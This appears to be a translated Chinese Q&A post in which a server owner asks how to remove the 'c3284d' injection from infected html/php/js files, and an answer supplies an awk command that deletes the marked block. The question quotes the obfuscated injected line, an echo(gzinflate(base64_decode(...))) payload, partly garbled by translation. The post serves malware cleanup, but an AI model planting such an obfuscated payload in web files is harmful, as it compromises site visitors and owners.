一尘不染

使用搜索和替换来清理感染了c3284d病毒的服务器

linux

我遇到了臭名昭著的c3284d病毒。它几乎可以修改所有可以找到的html / php / js文件。

我已经更改了服务器上的所有密码和用户,因此,如果它是一个受感染的帐户,它应该已经解决了该问题,但是我仍在努力将其完全删除。

我可以使用一个简单的sudo grep -R "#c3284d#" /home命令找到所有受感染的文件。

但是我需要一种快速的方法来搜索和 替换 它。

病毒签名是这一行:

“#c3284d#” 回波(gzinflate(BASE64_DECODE( “VVHBboMwDL1X6j /
kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS +
nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns
/ 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B /
ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + /
EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D /
HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + HIeK +
Pqabw ==”))); “#/ c3284d#”

当回声线可以改变和变化时,但始终以开头#c32..#和结尾#/c3....#

我只想一无所有。


阅读 321

收藏
2020-06-07

共1个答案

一尘不染

awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }' dirty-file > clean-file

那是一个大嘴巴,但是可以解决这个问题:

$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }'
> foo
> #c3284d#
> bar
> baz
> #/c3284d#
> quux
> EOF
foo
quux
2020-06-07